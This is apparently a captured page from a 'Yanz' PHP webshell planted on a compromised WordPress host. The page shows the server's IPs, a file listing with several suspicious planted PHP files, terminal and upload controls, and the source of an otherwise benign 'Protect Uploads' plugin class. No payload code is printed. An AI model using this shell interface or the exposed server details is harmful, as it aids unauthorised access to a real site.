Attention:
Uname:
Php:
Hdd:
Cwd:		Yanz Webshell! - PRIV8 WEB SHELL ORB YANZ BYPASS!
Linux server234.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
8.3.30 Safe mode: OFF Datetime: 2026-05-06 05:51:29
3907.15 GB Free: 1074.83 GB (27%)
/home/repauqkb/public_html/ drwxr-x--- [ root ] [ home ] Text

Server IP:
198.54.116.179
Client IP:
216.73.217.14
[ Files ][ Logout ]

File manager

NameSizeModifyPermissionsActions
[ . ]dir2026-05-06 01:37:04drwxr-x---Rename Touch
[ .. ]dir2025-04-18 09:10:57drwx--x--xRename Touch
[ wp-admin ]dir2026-05-05 01:36:32drwxr-xr-xRename Touch
[ wp-content ]dir2026-05-05 01:36:33drwxr-x---Rename Touch
[ wp-includes ]dir2026-05-05 01:36:38drwxr-xr-xRename Touch
.hcflag31 B2026-05-05 02:30:18-rw-r--r--Rename Touch Edit Download
.htaccess626 B2026-05-05 01:36:36-r--r--r--Rename Touch Edit Download
.htaccess.bk243 B2026-04-28 01:30:21-rw-r--r--Rename Touch Edit Download
.litespeed_flag297 B2026-05-06 01:37:04-rw-r--r--Rename Touch Edit Download
error_log20.61 MB2026-05-06 05:51:28-rw-r--r--Rename Touch Edit Download
goods.php173.77 KB2026-05-05 01:13:55-rw-r--r--Rename Touch Edit Download
index.php16.36 KB2026-05-05 01:36:36-r--r--r--Rename Touch Edit Download
license.txt19.44 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
lock360.php1.40 KB2026-05-05 02:30:18-rw-r--r--Rename Touch Edit Download
options-privacy-more.php768 B2025-06-24 17:01:07-rw-r--r--Rename Touch Edit Download
qinfofuns.php12.90 KB2026-04-23 18:25:11-rw-r--r--Rename Touch Edit Download
readme.html7.25 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-activate.php7.18 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-blog-header.php351 B2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-comments-post.php2.27 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-conffg.php122.70 KB2026-05-05 01:13:55-rw-r--r--Rename Touch Edit Download
wp-config-sample.php3.26 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-config.php3.55 KB2026-03-27 14:45:59-rw-r--r--Rename Touch Edit Download
wp-cron.php5.49 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-crrm.php77.12 KB2026-05-05 02:30:18-rw-r--r--Rename Touch Edit Download
wp-links-opml.php2.43 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-load.php3.84 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-login.php50.23 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-mail.php8.52 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-settings.php30.33 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-signup.php33.71 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wp-trackback.php5.09 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
wper.php16.31 KB2026-01-27 01:19:39-rw-r--r--Rename Touch Edit Download
xmlrpc.php3.13 KB2026-04-23 18:25:30-rw-r--r--Rename Touch Edit Download
yeni.php27.21 KB2026-04-23 17:49:33-rw-r--r--Rename Touch Edit Download
 
Change dir:
Read file:
Make dir: (Writeable)
Make file: (Writeable)
Terminal:
Upload file: (Writeable)

HEX
HEX
Server: LiteSpeed
System: Linux server234.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User: repauqkb (12019)
PHP: 8.3.30
Disabled: NONE
$ pwd: /proc/self/cwd/wp-content/plugins/wteld/admin/
Upload Files
File: //proc/self/cwd/wp-content/plugins/wteld/admin/class-protect-uploads-admin.php
<?php

class Alti_ProtectUploads_Admin
{

	private $plugin_name;
	private $version;
	private $messages = array();

	public function __construct($plugin_name, $version)
	{
		$this->plugin_name = $plugin_name;
		$this->version = $version;
	}

	public function get_plugin_name()
	{
		return $this->plugin_name;
	}

	public function add_submenu_page()
	{
		add_submenu_page('upload.php', $this->plugin_name, 'Protect Uploads <span class="dashicons dashicons-shield-alt" style="font-size:15px;"></span>', 'manage_options', $this->plugin_name . '-settings-page', array($this, 'render_settings_page'));
	}

	public function render_settings_page()
	{
		require plugin_dir_path(__FILE__) . 'views/' . $this->plugin_name . '-admin-settings-page.php';
	}

	public function enqueue_styles()
	{
		wp_enqueue_style($this->plugin_name, plugin_dir_url(__FILE__) . 'assets/css/protect-uploads-admin.css', array(), $this->version, 'all');
	}

	public function add_settings_link($links)
	{
		$settings_link = '<a href="upload.php?page=' . $this->plugin_name . '-settings-page">' . __('Settings') . '</a>';
		array_unshift($links, $settings_link);
		return $links;
	}

	public function get_uploads_dir()
	{
		$uploads_dir = wp_upload_dir();
		return $uploads_dir['basedir'];
	}

	public function get_uploads_url()
	{
		$uploads_dir = wp_upload_dir();
		return $uploads_dir['baseurl'];
	}

	public function get_uploads_subdirectories()
	{

		$directories = scandir(self::get_uploads_dir());
		$subs = array(self::get_uploads_dir());

		foreach ($directories as $directory) {

			if (is_dir(self::get_uploads_dir() . '/' . $directory) && !preg_match('/^\.*$/', $directory)) {
				$subs[] = self::get_uploads_dir() . '/' . $directory;
				$subDirectories = scandir(self::get_uploads_dir() . '/' . $directory);
				foreach ($subDirectories as $subDirectory) {
					if (is_dir(self::get_uploads_dir() . '/' . $directory . '/' . $subDirectory) && !preg_match('/^\.*$/', $subDirectory)) $subs[] = self::get_uploads_dir() . '/' . $directory . '/' . $subDirectory;
				}
			}
		}
		return $subs;
	}

	public function save_form($form)
	{
		if ($form['protection'] == 'index_php') {
			$this->create_index();
		}
		if ($form['protection'] == 'htaccess') {
			$this->create_htaccess();
		}
		if ($form['protection'] == 'remove') {
			$this->remove_index();
			$this->remove_htaccess();
		}
	}

	// used to check if the current htaccess has been generated by the plugin
	public function get_htaccess_identifier()
	{
		return "[plugin_name=" . $this->plugin_name . "]";
	}

	public function create_index()
	{
		// check if index php does not exists
		if (self::check_protective_file('index.php') === false) {

			$indexContent = "<?php // Silence is golden \n // " . self::get_htaccess_identifier() . " \n // https://www.alticreation.com/en/protect-uploads/ \n // date:" . date('d/m/Y') . "\n // .";
			$i = 0;
			foreach (self::get_uploads_subdirectories() as $subDirectory) {

				if (!file_put_contents($subDirectory . '/' . 'index.php', $indexContent)) {
					self::register_message('Impossible to create or modified the index.php file in ' . $subDirectory, 'error');
				} else {
					$i++;
				}
			}

			if ($i == count(self::get_uploads_subdirectories())) {
				self::register_message('The index.php file has been created in main folder and subfolders (two levels max).');
			}
		}
		// if index php already exists
		else {
			self::register_message('The index.php file already exists', 'error');
		}
	}

	public function create_htaccess()
	{
		// Content for htaccess file
		$date             = date('Y-m-d H:i.s');
		$phpv             = phpversion();

		$htaccessContent  = "\n# BEGIN " . $this->get_plugin_name() . " Plugin\n";
		$htaccessContent  .= "\tOptions -Indexes\n";
		$htaccessContent  .= "# [date={$date}] [php={$phpv}] " . self::get_htaccess_identifier() . " [version={$this->version}]\n";
		$htaccessContent  .= "# END " . $this->get_plugin_name() . " Plugin\n";

		// if htaccess does NOT exist yet
		if (self::check_protective_file('.htaccess') === false) {
			// try to create and save the new htaccess file
			if (!file_put_contents(self::get_uploads_dir() . '/' . '.htaccess', $htaccessContent)) {
				self::register_message('Impossible to create or modified the htaccess file.', 'error');
			} else {
				self::register_message('The htaccess file has been created.');
			}
		}
		else {
			// if content added to existing htaccess
			if (file_put_contents(self::get_uploads_dir() . '/.htaccess', $htaccessContent, FILE_APPEND | LOCK_EX)) {
				self::register_message('The htaccess file has been updated.');
			} else {
				self::register_message('The existing htaccess file couldn\'t be updated. Please check file permissions.', 'error');
			}
		}
	}

	public function remove_index()
	{
		$i = 0;
		foreach (self::get_uploads_subdirectories() as $subDirectory) {
			if (file_exists($subDirectory . '/index.php')) {
				unlink($subDirectory . '/index.php');
				$i++;
			}
		}
		if ($i == count(self::get_uploads_subdirectories())) {
			self::register_message('The index.php file(s) have(has) been deleted.');
		}
	}

	public function remove_htaccess()
	{
		if (file_exists(self::get_uploads_dir() . '/.htaccess')) {

			$htaccessContent = file_get_contents(self::get_uploads_dir() . '/.htaccess');
			$htaccessContent = preg_replace('/(# BEGIN protect-uploads Plugin)(.*?)(# END protect-uploads Plugin)/is', '', $htaccessContent);
			file_put_contents(self::get_uploads_dir() . '/.htaccess', $htaccessContent, LOCK_EX);

			// if htaccess is empty, we remove it.
			if (strlen(preg_replace("/(^[\r\n]*|[\r\n]+)[\s\t]*[\r\n]+/", "", file_get_contents(self::get_uploads_dir() . '/.htaccess'))) == 0) {
				unlink(self::get_uploads_dir() . '/.htaccess');
			}


			//
			self::register_message('The htaccess file has been updated.');
		}
	}

	public function get_protective_files_array()
	{
		$uploads_files = ['index.php', 'index.html', '.htaccess'];
		$response = [];
		foreach ($uploads_files as $file) {
			if (file_exists(self::get_uploads_dir() . '/' . $file)) {
				$response[] = $file;
			}
		}
		return $response;
	}

	public function check_protective_file($file)
	{
		if (in_array($file, self::get_protective_files_array())) {
			return true;
		} else {
			return false;
		}
	}

	public function get_uploads_root_response_code()
	{
		$uploads_headers = get_headers(self::get_uploads_url() . '/');
		$response = null;
		if (is_array($uploads_headers)) {
			if (preg_match('/200/', $uploads_headers[0])) $response = 200;
			if (preg_match('/403/', $uploads_headers[0])) $response = 403;
		}
		return $response;
	}

	public function get_htaccess_content()
	{
		return file_get_contents(self::get_uploads_dir() . '/.htaccess');
	}

	public function check_htaccess_is_self_generated()
	{
		if (self::check_protective_file('.htaccess') && preg_match('/' . self::get_htaccess_identifier() . '/', self::get_htaccess_content())) {
			return true;
		} else {
			return false;
		}
	}

	// heart? <3
	public function check_uploads_is_protected()
	{
		foreach (self::get_protective_files_array() as $file) {
			if ($file === 'index.html') {
				return true;
				break;
			}
			if ($file === 'index.php') {
				return true;
				break;
			}
			if ($file === '.htaccess' && self::get_uploads_root_response_code() === 200) {
					return false;
					break;
			}
		}
		if (self::get_uploads_root_response_code() === 403) {
			return true;
		}
		else {
			return false;
		}
	}

	public function check_protective_file_removable() {
		if( self::check_protective_file('index.html') ) {
			return false;
		}
		elseif( self::check_protective_file('.htaccess') === false && self::get_uploads_root_response_code() === 403 ) {
			return false;
		}
		else {
			return true;
		}
	}

	public function get_uploads_protection_message_array()
	{
		$response = [];
		foreach (self::get_protective_files_array() as $file) {
			if ($file === '.htaccess' && self::get_uploads_root_response_code() === 403) {
				$response[] = '<span class="dashicons dashicons-yes"></span> ' . __('.htaccess file is present and access to uploads directory returns 403 code.', $this->plugin_name);
			}
			if ($file === 'index.php') {
				$response[] = '<span class="dashicons dashicons-yes"></span> ' . __('index.php file is present.', $this->plugin_name);
			}
			if ($file === 'index.html') {
				$response[] = '<span class="dashicons dashicons-yes"></span> ' . __('index.html file is present.', $this->plugin_name);
			}
		}
		if (self::check_protective_file('.htaccess') === true && self::get_uploads_root_response_code() === 200) {
			$response[] = '<span class="dashicons dashicons-search"></span> ' . __('.htaccess file is present but not protecting uploads directory.', $this->plugin_name);
		}
		if (self::check_protective_file('.htaccess') === false && self::get_uploads_root_response_code() === 403) {
			$response[] = '<span class="dashicons dashicons-yes"></span> ' . __('Access to uploads directory is protected (403) with a global .htaccess or another global declaration.', $this->plugin_name);
		}
		return $response;
	}

	public function check_apache()
	{

		if (!function_exists('apache_get_modules')) {
			self::register_message('The Protect Uploads plugin cannot work without Apache. Yourself or your web host has to activate this module.');
		}
	}


	public function register_message($message, $type = 'updated', $id = 0)
	{
		$this->messages['apache'][] = array(
			'message' => __($message, $this->plugin_name),
			'type' => $type,
			'id' => $id
		);
	}

	public function display_messages()
	{

		foreach ($this->messages as $name => $messages) {
			foreach ($messages as $message) {
				return '<div id="message" class="' . $message['type'] . '"><p>' . $message['message'] . '</p></div>';
			}
		}
	}
}
@ Telegram